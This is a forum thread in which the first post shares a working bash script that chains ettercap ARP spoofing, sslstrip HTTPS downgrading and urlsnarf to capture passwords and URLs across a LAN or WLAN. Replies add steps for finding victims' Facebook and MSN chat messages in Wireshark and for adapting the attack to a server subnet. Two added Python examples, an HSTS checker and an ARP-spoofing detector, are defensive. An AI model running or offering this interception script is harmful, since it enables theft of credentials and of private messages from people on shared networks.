Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf
UPDATED SCRIPT 27/4 - added tcpxtract
UPDATE: How to find Facebook chat messages...
I got very tired of writing commands endlessly while pentesting my network, so I started writing a script for everything I do. This script is the one I use most.
I'm still very new at BackTrack/Linux, but this script really works for me, and I'm sure other beginners out there can put it to good use as well.
First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf; this section must remain commented out:
Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
This is because I use ettercap to do the ARP spoofing, but I don't want it to do the fake certificate thing (we have sslstrip to do that job).
Save this code to a new text file as anything.sh (make sure to chmod it executable: right click -> Properties -> Permissions -> check "is executable").
Code:
#!/bin/bash
# For the two yes/no questions, leaving the answer BLANK means yes
# (see the "$XTRACT"/"$NOYES" lines further down for how that works).
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of \"Session\"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
# One folder per session; all log files share the session name
mkdir /root/$SESSION/
# Start from empty iptables rules
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# sslstrip listens on port 10000 and writes its log; port 80 is redirected to it
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# urlsnarf dumps the visited URLs to a text file
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
# ettercap does the ARP spoofing, writes the pcap and the .eci log; quit it with "q"
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
# If the answer was left blank the variable is empty and the command runs as
# written; any other answer turns it into a non-existent command that does nothing
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
# Clean up: stop the helpers and flush iptables again
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Read the captured passwords out of the ettercap log
etterlog -p -i /root/$SESSION/$SESSION.eci
It's pretty straightforward...
This script will execute sslstrip with a log file, urlsnarf (dumping all the URLs to a txt file), and ettercap with ARP spoofing, log files (with the passwords) and a pcap file (for further analysis). All the files are put in the same folder, with identical filenames (of course with different extensions).
Furthermore, when quitting the script (and ettercap) properly with the key "q", the script will clean up after itself (shutting down sslstrip and urlsnarf and flushing iptables). At last it automatically reads out the passwords from the ettercap log file (.eci) and runs Wireshark for further analysis.
TIP: For me the easiest way to dump pictures from a pcap file (which the script generates) is by using NetworkMiner for Windows. It runs smoothly via Wine if you tweak it a bit, as this tutorial shows: hxxp://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html
HOW TO FIND MSN/FACEBOOK CHAT IN WIRESHARK:
Finding MSN chat is easy. There are many EXPRESSIONS in Wireshark; one has the name "MSNMS". If you apply that, it'll show you the messages.
Finding Facebook chat is a bit more complicated. There is no EXPRESSION or filter to use. BUT I found out:
CTRL+F brings up the packet search. Search for: /ajax/chat/send.php
ATTENTION: in the search box, check the box that searches by "string", and under "search in" choose Packet List.
That will give you the packets with the sent messages. When you select a packet, scroll down to the bottom and expand "Line-based text data:".
There you'll have the message if you look carefully.
It's not that elegant...
I have not tested this with receiving a message, but that should be fairly easy and almost the same. You can always start the sniffer, send a message or receive a message, and then stop sniffing. Then open the pcap in Wireshark and look at the packets. Identify the one with the received message and find a way to search for such a packet in the future.
Feel free to ask any questions.
Teddy Strand
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
Looks nice, but why not use Wireshark instead?
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
For me, Wireshark is far more advanced and time consuming. I use Wireshark to filter out other stuff, such as Facebook chat messages, MSN Messenger etc.
Wireshark is also capable of showing these passwords, but I find the etterlog or the sslstrip log faster. That being said, I still have much to learn about Wireshark.
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
As far as I know, the victim will never enter the SSL website at that port or any other port. sslstrip "strips" the "s" off the https. So for this attack to work, the website visited by the victim has to support both http and https. I.e., visiting Gmail connects to their https site, but with sslstrip activated, the victim gets "redirected" or "stripped" to http instead.
Not sure whether I'm explaining it so it's understandable?
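The downgrade described above only works while the browser is willing to follow an http:// link to the site. The defence a site owner has is HSTS: once a browser has cached a Strict-Transport-Security policy it rewrites http://site to https locally, so an on-path proxy never sees the plain-text form. The checker below is an added example, not code from the thread; the header values in WEAK and STRONG are constructed.

```python
"""Added example: judge whether a Strict-Transport-Security header would stop
an https->http downgrade. Constructed header values; not from the thread."""
import re

MIN_MAX_AGE = 180 * 24 * 3600  # 180 days, a widely used minimum

def parse_hsts(header):
    """Return {'max_age': int|None, 'include_subdomains': bool, 'preload': bool}."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', value.strip())  # value may be quoted
            if m:
                policy["max_age"] = int(m.group(1))
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy

def hsts_weaknesses(headers):
    """List what still leaves an http:// request downgradable; [] means strong."""
    hsts = next((v for k, v in headers.items()
                 if k.lower() == "strict-transport-security"), None)
    if hsts is None:
        return ["no Strict-Transport-Security header: every http:// visit can be downgraded"]
    p = parse_hsts(hsts)
    problems = []
    if p["max_age"] is None:
        problems.append("max-age missing: browsers ignore the header")
    elif p["max_age"] == 0:
        problems.append("max-age=0 clears any cached policy")
    elif p["max_age"] < MIN_MAX_AGE:
        problems.append(f"max-age={p['max_age']} is below {MIN_MAX_AGE}")
    if not p["include_subdomains"]:
        problems.append("includeSubDomains missing: subdomains can still be downgraded")
    if not p["preload"]:
        problems.append("not preloaded: the first ever visit is still downgradable")
    return problems

# Constructed responses: one weak, one strong.
WEAK = {"Content-Type": "text/html", "Strict-Transport-Security": "max-age=300"}
STRONG = {"Content-Type": "text/html",
          "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"}
```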
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
I believe that for the scenario
Victim --- MITM --- Gateway
when the victim goes to an https site, the website sends the user a certificate. The MITM intercepts that certificate and then sends the victim a fake certificate with a known encryption key. The victim sends the MITM the encrypted credentials, which the MITM can decrypt since he sent the fake certificate to them with a known key. Once decrypted, the MITM encrypts the credentials with the real certificate key and sends them along to the website.
Also, for the scenario
Victim ---- Gateway ---- MITM ---- Webserver
I'm assuming you're talking about a basic NAT situation with a DHCP router or something in a home. In this case, a MITM attack will not work. A MITM attack is based on the ARP protocol, which is only used in LANs. Read up on basic networking if you are unfamiliar with this.
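Since the attack in this thread rests on ARP, the matching detection on the defender's side is a watch on ARP traffic: an IP address announced by more than one MAC, a MAC that suddenly claims several IPs (gateway and victim at once), or a pinned gateway MAC changing. The following is an added example, not code from the thread; the ARP replies and the pinned table are constructed placeholders.

```python
"""Added example (not from the thread): arpwatch-style checks over a feed of
ARP replies. All addresses below are constructed."""
from collections import defaultdict

# Constructed feed of ARP replies as (sender_ip, sender_mac). The gateway
# 192.168.1.1 is first announced with one MAC and later with another.
ARP_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.20", "aa:bb:cc:00:00:14"),
    ("192.168.1.1", "AA:BB:CC:00:00:01"),   # same MAC, different case: no conflict
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # a second MAC now claims the gateway
    ("192.168.1.20", "de:ad:be:ef:00:99"),  # and the same MAC claims the victim too
]

# MAC addresses an administrator has pinned for critical hosts (constructed).
PINNED = {"192.168.1.1": "aa:bb:cc:00:00:01"}

def find_conflicts(replies):
    """IPs announced by more than one MAC -> sorted list of the MACs seen."""
    macs_by_ip = defaultdict(set)
    for ip, mac in replies:
        macs_by_ip[ip].add(mac.lower())
    return {ip: sorted(m) for ip, m in macs_by_ip.items() if len(m) > 1}

def multi_ip_macs(replies):
    """MACs that claim more than one IP: the shape of a host that has poisoned
    both the gateway's and a victim's entry so traffic flows through it."""
    ips_by_mac = defaultdict(set)
    for ip, mac in replies:
        ips_by_mac[mac.lower()].add(ip)
    return sorted(mac for mac, ips in ips_by_mac.items() if len(ips) > 1)

def pin_violations(replies, pinned):
    """Replies that announce a pinned IP with a MAC other than the pinned one."""
    return [(ip, mac.lower()) for ip, mac in replies
            if ip in pinned and mac.lower() != pinned[ip].lower()]

if __name__ == "__main__":
    for ip, macs in find_conflicts(ARP_REPLIES).items():
        print(f"ALERT {ip} claimed by {', '.join(macs)}")
    for mac in multi_ip_macs(ARP_REPLIES):
        print(f"ALERT {mac} claims several IPs")
    for ip, mac in pin_violations(ARP_REPLIES, PINNED):
        print(f"ALERT pinned {ip} announced by {mac}")
```

On a real network the tuples would come from a capture filter on ARP replies (opcode 2); the checks themselves do not change.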
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
Thanks for your replies.
However, I am not talking about a basic NAT situation or a home LAN.
Let me add clarity:
Assume a hypothetical situation. There is a webserver, a router (use Cisco for this example), and a victim (or victims). Say an adversary is able to do a MITM attack between the webserver and the default router the server talks to (that is: the MITM host is on that VLAN; assume ARP poisoning is possible).
Router <-----> MITM (host) <------> Webserver
Where the router (downstream net interface), MITM host and webserver are all in the same subnet. Now, to add more roadblocks to this scenario, let's assume the webserver only provides its services (i.e. webmail) via SSL.
So, if at all possible, given the tools used in scenario 1, how would the attack tactic and strategy change for the latter situation?
Thoughts?
Disclaimer: The example and the scenario provided above is hypothetical only. The question is asked for educational purposes only. Any information, suggestion, or input provided to answer the question above will NOT be used to perform any illegal activity.
UPDATE:
After playing around a bit, I realized that the situation is trivial for scenario 2.
All you need to do is switch "places" :). I hope that makes sense...
I tested it, works perfectly.
But can anybody answer this stupid question:
How do I get the deciphered version of the Digest Authorization password???
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
Thanks for the nice script!
But how should I use sslstrip with a proxy server?
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
Nice script! I tested this on my own network and tried sniffing my own Gmail info. In the pcap file I was able to see https packets, but where can I find the email/pw? >_< Thanks.
Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls
You shouldn't see any https packets. That means something's gone wrong. sslstrip "strips" the https, meaning that e.g. when entering Gmail, it will go to http://gmail.com and not https://gmail.com <-- which is encrypted. Do you understand?
My guess is that the ARP poisoning went wrong. Try it again.